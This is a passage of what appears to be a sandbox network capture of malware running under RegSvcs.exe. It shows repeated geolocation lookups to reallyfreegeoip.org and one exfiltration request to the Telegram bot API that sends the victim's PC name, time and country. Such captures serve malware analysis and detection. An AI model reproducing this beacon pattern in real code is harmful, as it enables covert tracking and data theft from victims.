cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vPrUIZtrxRXzkR6dH7CZi8kqiT%2BhHViqmMGTKVI9uxQGJeTodva%2B6LxvJO6etj63M8b5I4v%2Flxln7A75CZcs46BDX4ODRay%2FbKqjjLpUC3DPOGAnzFgptlSOVq8vaYz631s%2FOjl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f70697541a6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1554&rtt_var=587&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1879021&cwnd=241&unsent_bytes=0&cid=e7c261f0184f6b3a&ts=153&x=0"
Timestamp: 2025-01-11 05:49:18 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 7 | Source IP: 192.168.2.9 | Source Port: 49839 | Destination IP: 104.21.32.1 | Destination Port: 443 | PID: 7496 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:20 UTC | Bytes transferred: 61 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2025-01-11 05:49:20 UTC | Bytes transferred: 864 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:20 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889349
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5FqbWQlPPrqSS2KmGXv5S7yYzZIOo7ryFzv58ZXEW%2BxrWFgZWL1i%2FO%2FiglWLXqmid%2Fqcw2onRgwINmGfIkULiO%2B64%2BMqeRr9CLslH%2F7WOJpFt8XKhyOU%2FCHRTB31acgVRrLwyFe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f791acf4344-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1653&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1699650&cwnd=47&unsent_bytes=0&cid=868996878e874c7a&ts=143&x=0"
Timestamp: 2025-01-11 05:49:20 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8 | Source IP: 192.168.2.9 | Source Port: 49847 | Destination IP: 104.21.32.1 | Destination Port: 443 | PID: 7496 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:21 UTC | Bytes transferred: 61 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2025-01-11 05:49:21 UTC | Bytes transferred: 863 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:21 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889350
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tycFXlhF9Sw3wXIO1hl2vXKsmK%2FbQmUeOCtkIZzGgAPxe81INGwYTrytbQXN2B4OGodsItIG%2B26GDomCZsH38%2B%2B%2FPwHK29agVEAbaD84dQDd5qDNoLggA%2FnXukL4gkQrcM%2FUVAY4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f813fc241a6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1560&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1800246&cwnd=241&unsent_bytes=0&cid=8dc125e107280d09&ts=151&x=0"
Timestamp: 2025-01-11 05:49:21 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9 | Source IP: 192.168.2.9 | Source Port: 49853 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7496 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:22 UTC | Bytes transferred: 349 | Direction: OUT
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2025-01-11 05:49:22 UTC | Bytes transferred: 344 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 05:49:22 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2025-01-11 05:49:22 UTC | Bytes transferred: 55 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID: 10 | Source IP: 192.168.2.9 | Source Port: 49888 | Destination IP: 104.21.32.1 | Destination Port: 443 | PID: 7824 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:27 UTC | Bytes transferred: 85 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-01-11 05:49:27 UTC | Bytes transferred: 859 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:27 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889356
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiEg0wvl6Rll3DxhkLFkvZyAY7w5VkhwjKs0I9Y4S4ap%2FrC%2FfeLnqNJ%2FNR%2BxHTPLv9gnCeCX%2BS1OfGAiElp18q34DgOnmX8zoaWvbTQqNlgd4JgyyzyKPrEtGH8u1kvSrOJ0ae2a"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029fa5ec28c327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1610&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1787025&cwnd=189&unsent_bytes=0&cid=e725942085660406&ts=174&x=0"
Timestamp: 2025-01-11 05:49:27 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.9  49893        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:28 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-11 05:49:28 UTC  857                IN         HTTP/1.1 200 OK
                                                       Date: Sat, 11 Jan 2025 05:49:28 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889357
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m2D2fSPQP0O%2BrErTWZZF7FvAG429HgOBmQxjz742NuCvmUgTLfN%2FPUX1ltRPIts1rHfABPEvhwxGBINHEdUH318CXb2ax98fxrRjdhF4gH44oc9t%2Fq1UMXCgBEWVx%2B0cajVJa4u3"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029faaef5ec327-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1616&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1751649&cwnd=189&unsent_bytes=0&cid=2900603e614835fc&ts=146&x=0"
2025-01-11 05:49:28 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.9  49902        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:29 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-11 05:49:29 UTC  857                IN         HTTP/1.1 200 OK
                                                       Date: Sat, 11 Jan 2025 05:49:29 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889358
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FlWYZCOuS1jslbjVT3flXrwtbctnhrHvsJdT8%2F1KjZjN82nkM6Ek1Jih%2B4dWlKTEjKS0SZLuPcueURfDBe%2FUhTgpxu9b0k6ciHFEabPY2sDDdEJZcyW5SMpTkcv5HeFRo4PlJhvN"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029fb2ebfa1875-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1563&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=153&unsent_bytes=0&cid=a65cc1ad70bb1795&ts=133&x=0"
2025-01-11 05:49:29 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.9  49912        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:30 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-11 05:49:30 UTC  861                IN         HTTP/1.1 200 OK
                                                       Date: Sat, 11 Jan 2025 05:49:30 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889359
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnrnhwZquEOvhzfzfsjF5xgWW5yIJ%2BovcRFZkCN%2Fu4v80PkjW5WNO8V%2FQbfe6xJKJ%2F1j1boR4azmECt3zEs3idbt9vg%2BNeVTylwCjgRERwfWdHj5MnjTboIMtg5eLVW2%2BZnqteLh"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029fbab8a272b9-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1768&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1607044&cwnd=217&unsent_bytes=0&cid=4d9c412dc1834f26&ts=146&x=0"
2025-01-11 05:49:30 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.9  49922        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:31 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-11 05:49:31 UTC  861                IN         HTTP/1.1 200 OK
                                                       Date: Sat, 11 Jan 2025 05:49:31 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889361
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cv5bQXp18ANAhahUDx6WCWsFhCa8DJVL27ENnERGyv9rn9eX%2FXkljDgdOmHT%2Frm1Z%2FulQAt0ZUIPQHWH3XfgJ4QaNSnNteuJ%2FLDw21jPDSizoq%2BR%2FQIrEbZQ6pkuLYWzygOSyouy"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029fc2a9bf8cda-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1770&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1595628&cwnd=243&unsent_bytes=0&cid=97e33ac5ebff4dc8&ts=157&x=0"
2025-01-11 05:49:31 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.9  49933        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:33 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-11 05:49:33 UTC  855                IN         HTTP/1.1 200 OK
                                                       Date: Sat, 11 Jan 2025 05:49:33 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1889362
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkMKh0eR77RdXqlfnrFo5dxgO1Rs2I8C9G8GF9r3BvF2UZ0ePAAbQS7y0Q6BjWfPMBSRb9vJUAZYDt%2BRHpP9OjsVFH6emjzPrrLttKIuK40%2FceuWCBa289%2Flrd1HlpJFo1ophud5"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 90029fca889d1875-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1630&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1772920&cwnd=153&unsent_bytes=0&cid=bf9a4c0433ae2740&ts=133&x=0"
2025-01-11 05:49:33 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.9  49943        104.21.32.1     443               7824  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-11 05:49:34 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-11 05:49:34 UTC  853                IN         HTTP/1.1 200 OK
